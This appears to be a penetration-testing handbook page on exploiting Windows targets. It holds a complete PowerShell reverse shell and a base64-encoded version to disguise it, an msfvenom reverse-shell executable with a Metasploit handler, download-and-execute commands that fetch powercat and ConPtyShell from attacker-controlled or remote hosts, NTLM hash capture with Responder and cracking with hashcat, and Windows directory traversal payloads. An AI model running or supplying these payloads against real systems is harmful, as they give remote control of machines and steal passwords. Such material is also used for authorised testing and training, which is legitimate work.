Exploitation

When you find a vulnerability, Windows has some specific ways to exploit it that differ from Linux

Shells

Powershell encoded Reverse

A reverse shell sends a connection back to an attacker, from which they can execute commands on the target interactively. In PowerShell, this can be done by creating a TCP socket, receiving a command, and then sending back the output.

A short implementation of this is revshells.com - PowerShell #3 (Base64). It uses the following payload and replaces the $IP and $PORT with your server:

Payload
$client = New-Object System.Net.Sockets.TCPClient("$IP",$PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

This CyberChef recipe can be used to convert the above command into an encoded payload, looking way less like a reverse shell and containing fewer special characters:

Encoded Payload
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAJABJAFAAIgAsACQAUABPAFIAVAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

For testing or forensics, here is also a CyberChef recipe that decodes an encoded payload.

MSFVenom (.exe)

The Metasploit Framework has a collection of tools that work together, one of which is msfvenom. This command generates payloads in various formats that do certain things, often resulting in a shell for the attacker. You can list them all, but here are some of the most useful ones:

$ msfvenom -l payloads
...
windows/shell_reverse_tcp           Connect back to attacker and spawn a command shell
windows/shell/reverse_tcp           Spawn a piped command shell (staged). Connect back 
                                    to the attacker
windows/meterpreter_reverse_https   Connect back to attacker and spawn a Meterpreter
                                    shell. Requires Windows XP SP2 or newer.
  • windows/shell_reverse_tcp -> This is one of the only shells that doesn't require MSF, all it does is spawn an interactive CMD shell and connect back to your port, which may be a simple netcat listener using nc -lnvp 1337.

  • windows/shell/reverse_tcp -> The staged variant of the above, which requires MSF to send a second stage actually containing the shell functionality.

  • windows/meterpreter_reverse_https -> A fancier shell that sends a 'meterpreter' payload, which only MSF can handle. This has some more features and the _https variant even encrypts all traffic going back and forth making it hard to analyze.

Generate payloads using the msfvenom command, and -p to choose them by name. After this, you can fill in variables like LHOST and LPORT to tell the payload where your listener will be, and finally use -f to choose a format and -o where to place it.

Generate .exe payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f exe -o payload.exe

For the last two, you require setting up a matching handler in msfconsole:

Set up a handler
$ msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 exploit(multi/handler) > set LHOST 10.10.10.10
msf6 exploit(multi/handler) > set LPORT 1337
msf6 exploit(multi/handler) > run

[-] Handler failed to bind to 10.10.10.10:1337:-  -
[*] Started reverse TCP handler on 0.0.0.0:1337
[*] Command shell session 1 opened (10.10.10.10:1337 -> 10.10.10.10:2515)

Shell Banner:
-----

C:\Windows> whoami
WORKSTATION\user

See Metasploit to learn more about how to use the Metasploit framework to find and run exploits.

Download + IEX PowerCat

If your payload needs to be small, a solution is just to download the whole payload later, and evaluate it. These are known as "staged payloads" and one way to do this is by using powercat. This is a PowerShell script that can let you easily create a reverse shell. Simply download powercat.ps1 and host it yourself if the target does not have an internet connection. Then all that's left is to download and evaluate the script to connect with a simple command:

Attacker's Machine
$ python3 -m http.server  # Set up the HTTP server with powercat.ps1 inside
$ nc -lnvp 1337           # Set up the reverse shell listener
Payload
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1');
powercat -c 10.10.10.10 -p 1337 -e powershell

After this payload fires, you should get a request on your HTTP server from the target downloading your file, and a little later a reverse shell on your 2nd listener as well.

Fully Interactive Shell

A nice small addition you can add to your reverse shell listener is rlwrap, which wraps the nc listener using readline allowing you to use arrow keys for command history and editing:

rlwrap nc -lnvp 1337

The next level is tab completion, which requires a special shell on the target machine that connects to a netcat listener with stty set up. The following script can make such a clean connection:

Start a fully-interactive TTY reverse shell for tab completion and other interactive commands
Attacker: listener
stty raw -echo; (stty size; cat) | nc -lvnp 1337
Target: payload
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); 
Invoke-ConPtyShell $LHOST 1337

Forcing Authentication to Relay

When a client authenticates with a service using NTLM, a challenge-response mechanism is used to verify if the user knows their password without sending it over the network. If a victim authenticates with a malicious server set up by the attacker, the response to a challenge the attacker gives is based on the user's password and no other unknown factors. That means we can also then brute-force the associated password offline.

We can force such an authentication by, for example, making them request a share like \\10.10.10.10\share, or a file on a share with \\10.10.10.10\share\file. This will then make an authentication to your IP address, which you can abuse.

Requesting an IP address will force NTLM authentication, using a hostname chooses Kerberos instead!

Using a tool like Responder you can send them a challenge, which they will solve and give you back the answer allowing the password to be brute-forced:

$ responder -I tun0
...
[SMB] NTLMv2-SSP Client   : ::ffff:$IP
[SMB] NTLMv2-SSP Username : domain\user
[SMB] NTLMv2-SSP Hash     : user::domain:317fa5f2dd004ccf:E1714375CE4544DB806CE4AAE633CDBC:01010000000000000077F24ADD6FD9018B224A572597F60C00000000020008005A0053004800410001001E00570049004E002D00330055004B00370039004F003800350050004900440004003400570049004E002D00330055004B00370039004F00380035005000490044002E005A005300480041002E004C004F00430041004C00030014005A005300480041002E004C004F00430041004C00050014005A005300480041002E004C004F00430041004C00070008000077F24ADD6FD90106000400020000000800300030000000000000000000000000300000A1E4633A7918BDC606AA508FF308E1B782122CA729192CE34AEB53FF187F90EE0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310037000000000000000000

The long Hash value can then be put into a file to be cracked with tools like Hashcat:

hashcat -m 5600 responder.hash /list/rockyou.txt

Web tricks

Due to some Windows quirks, the actions that websites perform behind the scenes might behave differently than on Linux. This chapter collects a few of these tricks that can often be abused because developers forget about them.

Slashes (/ vs \)

Directory Traversal vulnerabilities are quite common, where you use the special .. sequence in a path to go up one directory, and then access a file/folder that's outside the regular allowed area. On Linux this is often done like so:

Linux directory traversal
/var/www/html/uploads/ + ../../../../etc/passwd = /etc/passwd

Because of this most path accesses block or replace / characters from the string. On Windows systems, this is not enough, however, as the main directory separator is a backslash (\) instead.

Windows with backslash
C:\inetpub\wwwroot\uploads\ + ..\..\..\Windows\win.ini = C:\Windows\win.ini

Pretty often the Windows APIs even allow interchangeable use of them, resulting in payloads containing mixed forward and backward shashes.

A good fuzzing list containing many of these techniques can be found here:

https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/traversal.txt

ISS Short filenames (SFNs, 8.3 filenames)

Back in the DOS versions of Windows, filenames could only first 8 characters as their name and 3 characters as their extension. No more. Because of Windows's backward compatibility standards, all files actually still follow this rule. But nowadays longer filenames are allowed with just an alias stored as an 8.3 short filename (SFN) if it doesn't fit, for example:

An Internet Information Services (IIS) webserver running on the machine might actually interpret these SFNs and give you back the content of the larger file. This can be incredibly useful for directory/filename brute-forcing because any giant path can be found this way by just guessing its short name. Read the following article to understand how we can efficiently guess these names:

Tools such as shortscan implement clever techniques to find all possible short filenames and print if the service is vulnerable:

$ shortscan http://example.org/
Shortscan v0.6 ยท an IIS short filename enumeration tool by bitquark
Target: http://example.org/
Running: EOS (vny/044E) [!]
Vulnerable: No (or no 8.3 files exist)

Last updated